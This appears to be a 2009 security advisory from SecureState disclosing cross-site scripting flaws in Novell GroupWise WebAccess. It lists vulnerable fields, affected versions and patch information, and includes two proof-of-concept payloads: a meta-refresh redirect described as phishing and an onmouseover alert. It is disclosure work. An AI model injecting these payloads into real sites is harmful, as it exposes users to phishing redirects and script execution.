Novell GroupWise Web Access Multiple XSS /============================================\ /~ SecureState R&D Team - leroy and sasquatch ~\ /~ Discovered: 11-24-08, 03-05-09 ~\ \~ Vendor Notified: 01-06-09, 03-05-09 ~/ \~ Vendor Publication: 05-21-09 ~/ \============================================/ /------------------------------------------------------------------------------------------------\ /~ Novell's Groupwise WebAccess login page is vulnerable to several cross-site scripting attacks. ~\ /~ ~\ < Example URL: https://www.website.com/gw/webacc > \~ ~/ \~ An attempt to deter the attack is made in that <script> tags are replaced with <!-- pt> ~/ \------------------------------------------------------------------------------------------------/ |--------------------------------------------------------------| | Vulnerable Fields: GWAP.version, User.Theme.index, User.lang | | Vulnerable Versions: 7.0.1, 7.0.3, ? | |--------------------------------------------------------------| | Vulnerable Fields: User.Lang | | Vulnerable Versions: 8.0, ? | |--------------------------------------------------------------| |------------------------------------------------------------------------------| | Phishing via URL Redirection: | | "/><meta http-equiv="refresh" content="0; url=http://www.securestate.com" /> | |------------------------------------------------------------------------------| | JavaScript Execution Proof of Concept: | | " /><div onmouseover="alert('xss')" style="javascript:visibility:visible;"> | |------------------------------------------------------------------------------| |--------------------------------------------------------------------------------| | Fix Info --> Technical Information Document 7003271 | | | | http://www.novell.com/support/search.do?usemicrosite=true&searchString=7003271 | |--------------------------------------------------------------------------------| | Version 7 --> 7.03 Hot Patch 2 | | Fixes vulnerable fields: GWAP.version, User.Theme, but not User.lang | |--------------------------------------------------------------------------------| | Version 8 (CVE-2009-1635) | |--------------------------------------------------------------------------------|